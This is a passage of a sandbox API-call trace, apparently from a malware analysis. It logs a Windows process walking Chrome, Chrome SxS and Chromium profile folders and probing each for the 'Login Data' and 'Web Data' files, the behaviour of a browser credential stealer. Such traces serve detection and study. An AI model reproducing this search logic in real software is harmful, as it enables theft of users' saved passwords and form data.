(_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.602] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.602] wcscat (in: _Dest=0x28b454, _Source="Safe Browsing Channel IDs" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs" [0088.602] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.602] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcslen (_String="Safe Browsing Channel IDs-journal") returned 0x21 [0088.603] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.603] wcscat (in: _Dest=0x28b454, _Source="Safe Browsing Channel IDs-journal" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" [0088.603] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcslen (_String="Safe Browsing Cookies") returned 0x15 [0088.603] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.603] wcscat (in: _Dest=0x28b454, _Source="Safe Browsing Cookies" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" [0088.603] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcslen (_String="Safe Browsing Cookies-journal") returned 0x1d [0088.603] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.603] wcscat (in: _Dest=0x28b454, _Source="Safe Browsing Cookies-journal" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" [0088.603] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcslen (_String="SSLErrorAssistant") returned 0x11 [0088.603] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.603] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.603] wcscat (in: _Dest=0x28b454, _Source="SSLErrorAssistant" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0088.603] wcscmp (_String1="SSLErrorAssistant", _String2="..") returned 1 [0088.603] wcscmp (_String1="SSLErrorAssistant", _String2=".") returned 1 [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 0x50 [0088.603] wcslen (_String="Web Data") returned 0x8 [0088.603] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 0x50 [0088.603] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\" [0088.603] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Web Data" [0088.603] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\web data")) returned 0xffffffff [0088.603] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 0x50 [0088.603] wcslen (_String="Login Data") returned 0xa [0088.604] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0088.604] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 0x50 [0088.604] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\" [0088.604] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data" [0088.604] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\login data")) returned 0xffffffff [0088.604] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.604] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.604] wcslen (_String="SwiftShader") returned 0xb [0088.604] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.604] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.604] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.604] wcscat (in: _Dest=0x28b454, _Source="SwiftShader" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader" [0088.604] wcscmp (_String1="SwiftShader", _String2="..") returned 1 [0088.604] wcscmp (_String1="SwiftShader", _String2=".") returned 1 [0088.604] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader") returned 0x4a [0088.604] wcslen (_String="Web Data") returned 0x8 [0088.604] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader" [0088.604] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader") returned 0x4a [0088.604] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\" [0088.604] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Web Data" [0088.604] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swiftshader\\web data")) returned 0xffffffff [0088.605] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader") returned 0x4a [0088.605] wcslen (_String="Login Data") returned 0xa [0088.605] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader" [0088.605] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader") returned 0x4a [0088.605] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\" [0088.605] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Login Data" [0088.605] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwiftShader\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swiftshader\\login data")) returned 0xffffffff [0088.605] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.605] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.605] wcslen (_String="SwReporter") returned 0xa [0088.605] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.605] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.605] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.605] wcscat (in: _Dest=0x28b454, _Source="SwReporter" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0088.605] wcscmp (_String1="SwReporter", _String2="..") returned 1 [0088.605] wcscmp (_String1="SwReporter", _String2=".") returned 1 [0088.605] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 0x49 [0088.605] wcslen (_String="Web Data") returned 0x8 [0088.605] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0088.605] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 0x49 [0088.606] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\" [0088.606] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Web Data" [0088.606] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swreporter\\web data")) returned 0xffffffff [0088.606] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 0x49 [0088.606] wcslen (_String="Login Data") returned 0xa [0088.606] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0088.606] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 0x49 [0088.606] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\" [0088.606] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data" [0088.606] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\swreporter\\login data")) returned 0xffffffff [0088.606] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 1 [0088.606] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.606] wcslen (_String="WidevineCdm") returned 0xb [0088.606] wcscpy (in: _Dest=0x28b454, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data" [0088.606] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x3e [0088.606] wcscat (in: _Dest=0x28b454, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\" [0088.606] wcscat (in: _Dest=0x28b454, _Source="WidevineCdm" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0088.606] wcscmp (_String1="WidevineCdm", _String2="..") returned 1 [0088.606] wcscmp (_String1="WidevineCdm", _String2=".") returned 1 [0088.606] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 0x4a [0088.606] wcslen (_String="Web Data") returned 0x8 [0088.606] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0088.606] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 0x4a [0088.606] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\" [0088.606] wcscat (in: _Dest=0x28ad50, _Source="Web Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Web Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Web Data" [0088.606] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Web Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\web data")) returned 0xffffffff [0088.606] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 0x4a [0088.607] wcslen (_String="Login Data") returned 0xa [0088.607] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm" [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 0x4a [0088.607] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\" [0088.607] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data" [0088.607] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\login data")) returned 0xffffffff [0088.607] FindNextFileW (in: hFindFile=0x594e38, lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 0 [0088.607] FindClose (in: hFindFile=0x594e38 | out: hFindFile=0x594e38) returned 1 [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0088.607] wcslen (_String="Google\\Chrome SxS\\User Data") returned 0x1b [0088.607] wcscpy (in: _Dest=0x28c9a8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0088.607] wcscat (in: _Dest=0x28c9a8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0088.607] wcscat (in: _Dest=0x28c9a8, _Source="Google\\Chrome SxS\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned 0x42 [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned 0x42 [0088.607] wcslen (_String="*.*") returned 0x3 [0088.607] wcscpy (in: _Dest=0x28af7c, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data" [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data") returned 0x42 [0088.607] wcscat (in: _Dest=0x28af7c, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data\\" [0088.607] wcscat (in: _Dest=0x28af7c, _Source="*.*" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*" [0088.607] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome SxS\\User Data\\*.*", lpFindFileData=0x28b204 | out: lpFindFileData=0x28b204) returned 0xffffffff [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0088.607] wcslen (_String="Chromium\\User Data") returned 0x12 [0088.607] wcscpy (in: _Dest=0x28c9a8, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0088.607] wcscat (in: _Dest=0x28c9a8, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0088.607] wcscat (in: _Dest=0x28c9a8, _Source="Chromium\\User Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data" [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data") returned 0x39 [0088.607] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Chromium\\User Data") returned 0x39 